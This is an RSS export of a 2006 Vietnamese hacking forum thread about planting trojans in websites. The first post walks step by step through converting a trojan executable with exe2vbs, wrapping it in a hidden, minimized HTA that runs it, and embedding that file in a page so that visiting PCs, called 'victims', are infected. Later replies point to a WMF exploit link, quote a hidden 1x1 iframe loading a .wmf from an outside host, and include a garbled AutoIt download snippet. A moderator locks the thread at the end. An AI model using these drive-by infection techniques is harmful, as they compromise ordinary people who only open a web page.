<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "Đính trojan vào website-Cool"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/28.hva</link>
		<description><![CDATA[Latest messages posted in the topic "Đính trojan vào website-Cool"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ Gần đây trong topic xuất hiện rất nhiều bài viết hỏi xung quanh vấn đề này !

Bài viết này sẽ hướng dẫn các bạn convert file trojan sang mã vbscript ! Từ đó đưa lên website và tiến hành lây nhiễm xuống các pc truy cập ... 
Cơ chế chạy các đoạn vbscript cũng giống như các đoạn mã các website dùng để tự động set homepage, tuy nhiên nó không sử dụng được cho hệ điều hành xp sp2 hoặc trình duyệt đã khóa activeX !<span class="link"> http://mail.packetstormsecurity.org/trojans/exe2vbs.zip</span>

Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi 
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>&lt;script language=vbs&gt;</pre>
		</div>
vào trên cùng 

Xuống dưới cùng thay dòng: WScript.CreateObject("WScript.Shell").run(pth)

bằng
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>Set Shell1 = CreateObject&#40;"WScript.Shell"&#41;
Shell1.Run&#40;pth&#41;
&lt;/script&gt;
&lt;HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' /&gt;
&lt;/head&gt;
&lt;body onload='window.close&#40;&#41;'&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
		</div>
Sau đó save lại thành file trojan.hta Sau đó mở file web ra thêm code này vào để run file trojan.hta 
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>&lt;center&gt; 
&lt;span datasrc="#oRun" datafld="view" dataformatas="html"&gt;&lt;/span&gt; 
&lt;xml id="oRun"&gt; 
&lt;preview&gt; 
&lt;view&gt; 
&lt;!&#91;CDATA&#91; 
&lt;object id="oFile" data="trojan.hta?id=1"&gt;&lt;/object&gt; 
&#93;&#93;&gt; 
&lt;/view&gt; 
&lt;/preview&gt; 
&lt;/xml&gt; 
&lt;/center&gt; 
&lt;/body&gt; 
&lt;/html&gt;</pre>
		</div>
File htm này sẽ là file để victim truy cập ! Chúc thành công


Phương pháp này thực ra không mới ( bạn có thể sử dụng 1 code hta để tự động set homepage, thay đổi cấu hình mặc định của pc, tự động download file về máy tính ... ) tuy nhiên việc tự động run các ActiveX này không còn thực hiện được với XP Sp2 nữa rồi !
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9221</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9221</link>
				<pubDate><![CDATA[Sat, 22 Jul 2006 23:48:24]]> GMT</pubDate>
				<author><![CDATA[ lang_tu_phi_dao]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ Anh ơi em kô hiểu lắm anh có thể chỉ em rõ hơn nữa được kô ..Em cám ơn anh trước..]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9637</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9637</link>
				<pubDate><![CDATA[Mon, 24 Jul 2006 15:50:24]]> GMT</pubDate>
				<author><![CDATA[ peterhiep]]></author>
			</item>
			<item>
				<title>Re: Đính trojan vào website-Cool</title>
				<description><![CDATA[ Cách này tui xem trên mấy 4rum khác từ lâu roài
Ko ăn thua gì đâu :lol:) 
lại còn mất công chờ  exe2vbs nó convert nữa chứ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9642</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9642</link>
				<pubDate><![CDATA[Mon, 24 Jul 2006 16:03:12]]> GMT</pubDate>
				<author><![CDATA[ tuananhxpmaster]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9643</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9643</link>
				<pubDate><![CDATA[Mon, 24 Jul 2006 16:07:26]]> GMT</pubDate>
				<author><![CDATA[ peterhiep]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">peterhiep wrote:</cite><br>
		<blockquote>Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với&nbsp;
		</blockquote>
pm : tuananhxp.computer@btinternet.com anh giúp cho]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9645</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#9645</link>
				<pubDate><![CDATA[Mon, 24 Jul 2006 16:23:50]]> GMT</pubDate>
				<author><![CDATA[ tuananhxpmaster]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">peterhiep wrote:</cite><br>
		<blockquote>Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với&nbsp;
		</blockquote>
 Bạn có thể nhúng trojan vào file *.html nhưng spy, keylogger thì do dung lượng nó lớn dẫn đến việc bạn không thể nhúng nó vào file *.html (Mà mình thấy chỉ có thể dụ victim download về thôi  :twisted: )]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10256</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10256</link>
				<pubDate><![CDATA[Wed, 26 Jul 2006 20:49:39]]> GMT</pubDate>
				<author><![CDATA[ chupichu]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ uhm` bạn ah` bạn có biết làm một con victim kô chỉ mình làm với giúp đở mình nha có gí liên hệ với mình qua Gmail:sptink29@gmail.com]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10265</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10265</link>
				<pubDate><![CDATA[Wed, 26 Jul 2006 22:13:14]]> GMT</pubDate>
				<author><![CDATA[ peterhiep]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">peterhiep wrote:</cite><br>
		<blockquote>uhm` bạn ah` bạn có biết làm một con victim kô chỉ mình làm với giúp đở mình nha có gí liên hệ với mình qua Gmail:sptink29@gmail.com&nbsp;
		</blockquote>

Con "victim" là con gì dzậy, tui mới nghe lần đầu  :mrgreen: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10272</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10272</link>
				<pubDate><![CDATA[Wed, 26 Jul 2006 23:05:34]]> GMT</pubDate>
				<author><![CDATA[ hackermientay]]></author>
			</item>
			<item>
				<title>Re: Đính trojan vào website-Cool</title>
				<description><![CDATA[ Victim là từ tiếng Anh có nghĩa là nạn nhân đó bạn. Ý chỉ mấy cái PC mở trang web của bạn lên đó :mrgreen: 
Lần đầu tiên mình thấy có người hỏi về con victim đó :mrgreen: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10281</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10281</link>
				<pubDate><![CDATA[Thu, 27 Jul 2006 00:05:26]]> GMT</pubDate>
				<author><![CDATA[ X7iVi4n]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ Ngồi đó mà đính đi, nó cài soft chống virus thì ở đó mà khóc. Gặp gà mới chết thui.

Gửi bà con cái link này, scan link trước khi truy cập :D
http://www.explabs.com/linkscanner/]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10465</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#10465</link>
				<pubDate><![CDATA[Thu, 27 Jul 2006 18:29:08]]> GMT</pubDate>
				<author><![CDATA[ kara_men]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ cách đính này cũ lắm rồi]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#11003</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#11003</link>
				<pubDate><![CDATA[Sat, 29 Jul 2006 18:38:35]]> GMT</pubDate>
				<author><![CDATA[ blue_river1]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ WMF Exploit
http://kehoach45a.com/a]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#11346</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#11346</link>
				<pubDate><![CDATA[Mon, 31 Jul 2006 10:28:19]]> GMT</pubDate>
				<author><![CDATA[ Luke]]></author>
			</item>
			<item>
				<title>Re: Đính trojan vào website-Cool</title>
				<description><![CDATA[ Anh luke là đỉnh nhất
giờ mới sáng mắt ra( :shock: ) chớ trước đây làm mấy cái vbscript chạy chẳng dc.
THANK nha LUKE nhiều]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12032</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12032</link>
				<pubDate><![CDATA[Wed, 2 Aug 2006 15:33:55]]> GMT</pubDate>
				<author><![CDATA[ com_hacker]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ Chài Ạ ! Cái link của Ông luke là kí j` thế? khả nghi wa' ! lần sau gửi link lên thì fair có note nhé!]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12054</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12054</link>
				<pubDate><![CDATA[Wed, 2 Aug 2006 17:14:33]]> GMT</pubDate>
				<author><![CDATA[ dongkivs8xx]]></author>
			</item>
			<item>
				<title>Re: Đính trojan vào website-Cool</title>
				<description><![CDATA[ Ai bảo chạy thử làm gì
<span class="link"> http://viewhtml.com</span>
view code mà nghiên cứu đã chứ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12404</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12404</link>
				<pubDate><![CDATA[Fri, 4 Aug 2006 18:05:34]]> GMT</pubDate>
				<author><![CDATA[ com_hacker]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">Luke wrote:</cite><br>
		<blockquote>WMF Exploit<span class="link"> http://kehoach45a.com/a&nbsp;</span>
		</blockquote>
ông anh này mới đúng là cao thủ võ lâm.ông anh viết nhiều nhiều cho anh em newbie chúng tôi học hỏi thêm.tks a lot.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12494</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#12494</link>
				<pubDate><![CDATA[Sat, 5 Aug 2006 03:10:01]]> GMT</pubDate>
				<author><![CDATA[ jamesmr]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">Luke wrote:</cite><br>
		<blockquote>WMF Exploit<span class="link"> http://kehoach45a.com/a&nbsp;</span>
		</blockquote>
Luke có tool (exe) không share cho em cái(jamesmr198@yahoo.com).tôi có mã nguon(vs203) nhưng compile nó báo lỗi hoài(báo lỗi khi biên dịch file winnt.h,winbase.h)]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13268</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13268</link>
				<pubDate><![CDATA[Tue, 8 Aug 2006 13:40:12]]> GMT</pubDate>
				<author><![CDATA[ jamesmr]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ View code rồi mà vẫn chưa hiểu, bây giờ mình muốn nó tự download và chạy 1 file exe của mình thì làm thế nào nhỉ? có phải thay cái src trong: ('<iframe src="http://kehoach45a.com/shop/picasa.wmf" width="1" height="1"></iframe>') bằng url đến file exe của mình không?]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13293</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13293</link>
				<pubDate><![CDATA[Tue, 8 Aug 2006 16:15:18]]> GMT</pubDate>
				<author><![CDATA[ mgdaubo]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ he he bác ngồi đấy mà thay. 

Lập trình AutoIt :

Line(File"c:\windows\download.exe);
$download =StringReplace($ie.LocationURL,"http://services.google.com/picasa_referrals.html","http://dl.google.com/referrals/picas2Setup.exe")
$download =StringReplace($ie.LocationURL)
Line 0 (file "c:\\windows\download.exe");
$ie.Navigate($download)
$ie.Navigate($download) 


Không biết em nói thế có đúng không?? nếu không phải em xin lỗi bác  luke  vì đã mạo phạm.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13332</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13332</link>
				<pubDate><![CDATA[Tue, 8 Aug 2006 18:06:25]]> GMT</pubDate>
				<author><![CDATA[ phamtienhuong]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ Exploit Win32 WMF-PFV ????]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13333</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13333</link>
				<pubDate><![CDATA[Tue, 8 Aug 2006 18:09:38]]> GMT</pubDate>
				<author><![CDATA[ xuanson]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ Ah hiểu sơ sơ rồi, có phải là cái này lợi dụng lỗ hổng của file wmf không? nguyên tắc là đính 1 exe vào 1 file wmf rồi đưa lên web để window tự chạy file wmf đó ,có phải không?
Nhưng còn cái đoạn code của Luke đếm lượt truy cập rồi lưu vào cookie làm gì vậy?
Mà nó còn liên quan gì tới lập trình autoit gì nữa vậy bạn phamtienhuong?
Chủ yếu là Exploit Win32 WMF thì lại ko thấy nói gì đến.
Các bạn giải thích dùm đi!]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13393</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13393</link>
				<pubDate><![CDATA[Tue, 8 Aug 2006 21:24:56]]> GMT</pubDate>
				<author><![CDATA[ mgdaubo]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">mgdaubo wrote:</cite><br>
		<blockquote>Ah hiểu sơ sơ rồi, có phải là cái này lợi dụng lỗ hổng của file wmf không? nguyên tắc là đính 1 exe vào 1 file wmf rồi đưa lên web để window tự chạy file wmf đó ,có phải không?
Các bạn giải thích dùm đi!&nbsp;
		</blockquote>
 có 1 tool embed file exe vào file wmf ,nếu ai co share cho AE cái.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13416</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13416</link>
				<pubDate><![CDATA[Tue, 8 Aug 2006 23:14:24]]> GMT</pubDate>
				<author><![CDATA[ jamesmr]]></author>
			</item>
			<item>
				<title>Đính trojan vào website-Cool</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">mgdaubo wrote:</cite><br>
		<blockquote>View code rồi mà vẫn chưa hiểu, bây giờ mình muốn nó tự download và chạy 1 file exe của mình thì làm thế nào nhỉ? có phải thay cái src trong: ('<iframe src="http://kehoach45a.com/shop/picasa.wmf" width="1" height="1"></iframe>') bằng url đến file exe của mình không?&nbsp;
		</blockquote>
 ko phải, bạn phải tìm tool embed file exe vào wmf.ai có share cho ae cái.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13419</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#13419</link>
				<pubDate><![CDATA[Tue, 8 Aug 2006 23:16:31]]> GMT</pubDate>
				<author><![CDATA[ jamesmr]]></author>
			</item>
			<item>
				<title>Re: Đính trojan vào website-Cool</title>
				<description><![CDATA[ anh ơi anh có thể cho em cái key của con magic ps se ++ ko ạ  :^) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#107157</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#107157</link>
				<pubDate><![CDATA[Sun, 30 Dec 2007 21:33:25]]> GMT</pubDate>
				<author><![CDATA[ crystal_eg]]></author>
			</item>
			<item>
				<title>Re: Đính trojan vào website-Cool</title>
				<description><![CDATA[ Trời ơi, cái bài này từ 2006 giờ lôi ra xin key của PS-Magic ????
Topic locked (vì lý do không phù hợp với đường lối hiện tại của HVA).
crystal_eg warned.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1851.hva#107193</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1851.hva#107193</link>
				<pubDate><![CDATA[Mon, 31 Dec 2007 00:12:26]]> GMT</pubDate>
				<author><![CDATA[ LeVuHoang]]></author>
			</item>
	</channel>
</rss>
